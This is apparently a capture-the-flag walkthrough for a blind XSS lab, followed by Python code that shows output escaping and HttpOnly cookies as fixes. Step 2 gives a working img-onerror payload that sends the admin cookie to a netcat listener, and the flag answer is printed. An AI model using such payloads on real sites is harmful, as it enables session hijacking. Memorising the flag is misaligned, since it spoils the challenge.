HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

SupportDesk

Blind XSS · Blind XSS (Contact Form → Admin Panel)
Difficulty: Medium
Vuln class: Blind XSS (Contact Form → Admin Panel)
Steps: 3
// Objective
Inject a payload into the contact form that exfiltrates the admin cookie when the admin bot renders the submission in the admin panel.
// Tools required
curl, nc (netcat), Browser
// Step-by-step walkthrough
1
Start a listener in the terminal
Open the terminal in the lab. Start netcat listening on a port of your choice.
Command / Input
nc -lnvp 8888
Leave this running. Your XSS payload will call back to this port when the admin bot reads your ticket.
2
Submit the payload via the contact form
In the browser, go to the contact form at http://localhost:$PORT. Fill in any name and email. In the message field, enter the XSS payload pointing to your listener.
Command / Input
<img src=x onerror="fetch('http://localhost:8888/?c='+document.cookie)">
The admin bot visits the admin panel every 5 seconds and renders all submissions as raw HTML.
3
Wait for the callback
Within 5 seconds the admin bot reads your ticket. Your payload fires in the bot's context where the admin_session cookie is set. Watch the netcat terminal.
Output
GET /?c=admin_session=HackrGG{h3lpd3sk_bl1nd_x55_4dm1n_pwn} HTTP/1.1
The cookie value after admin_session= is the flag.
// Flag
Flag value
HackrGG{h3lpd3sk_bl1nd_x55_4dm1n_pwn}
The admin_session cookie value received in your netcat callback.
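The two root causes this lab relies on are visible in steps 2 and 3: the admin panel concatenates submissions into the page as raw HTML, and the admin_session cookie is readable from script via document.cookie. The following is an added example, not part of the walkthrough or the SupportDesk lab code, showing the vulnerable rendering next to a hardened version that escapes every user-controlled field, plus a Set-Cookie builder and check for the HttpOnly attribute. The submission records, the row template, and the session token value are all constructed here for illustration; the second sample message is the payload from step 2.

```python
"""Hardened admin-panel rendering and cookie attributes (added example)."""
from html import escape

# Constructed sample submissions; the second message is the payload from the walkthrough.
SAMPLE_SUBMISSIONS = [
    {"name": "alice", "email": "alice@example.test",
     "message": "Printer on floor 2 is jammed."},
    {"name": "x", "email": "x@example.test",
     "message": '<img src=x onerror="fetch(\'http://localhost:8888/?c=\'+document.cookie)">'},
]

FIELDS = ("name", "email", "message")


def render_raw(sub):
    # The vulnerable pattern from the lab: user fields dropped straight into the markup,
    # so any tag in the message becomes live HTML when the admin bot loads the panel.
    return "<tr>" + "".join(f"<td>{sub[k]}</td>" for k in FIELDS) + "</tr>"


def render_escaped(sub):
    # Hardened: every user field goes through html.escape; quote=True also turns
    # ' and " into entities so the value is safe inside attributes as well as text.
    return "<tr>" + "".join(f"<td>{escape(sub[k], quote=True)}</td>" for k in FIELDS) + "</tr>"


def contains_live_markup(rendered_row):
    # Review check: strip the fixed row template; nothing user-supplied should leave
    # a bare '<' or '>' behind. Escaped output only carries &lt; / &gt; entities.
    body = rendered_row
    for tag in ("<tr>", "</tr>", "<td>", "</td>"):
        body = body.replace(tag, "")
    return "<" in body or ">" in body


def session_cookie_header(token, secure=True):
    # Hardened Set-Cookie line for the admin session. HttpOnly keeps the value out of
    # document.cookie, so a script that does run cannot read it the way step 3 does.
    # 'token' is a constructed placeholder, not a real session value.
    attrs = [f"admin_session={token}", "HttpOnly", "SameSite=Lax", "Path=/"]
    if secure:
        attrs.append("Secure")
    return "; ".join(attrs)


def cookie_is_httponly(set_cookie_header):
    # Check a Set-Cookie header (e.g. from a response capture) for HttpOnly, case-insensitively.
    return any(part.strip().lower() == "httponly" for part in set_cookie_header.split(";"))


if __name__ == "__main__":
    for sub in SAMPLE_SUBMISSIONS:
        print("raw    :", render_raw(sub), "| live markup:", contains_live_markup(render_raw(sub)))
        print("escaped:", render_escaped(sub), "| live markup:", contains_live_markup(render_escaped(sub)))
    hdr = session_cookie_header("EXAMPLE_SESSION_TOKEN")
    print(hdr, "| HttpOnly:", cookie_is_httponly(hdr))
```

Escaping on output is the fix for the rendering bug itself; the HttpOnly attribute is a separate layer that limits what an injected script can reach if another sink is missed, and a response-header capture from the lab can be fed to cookie_is_httponly to confirm whether the attribute is set.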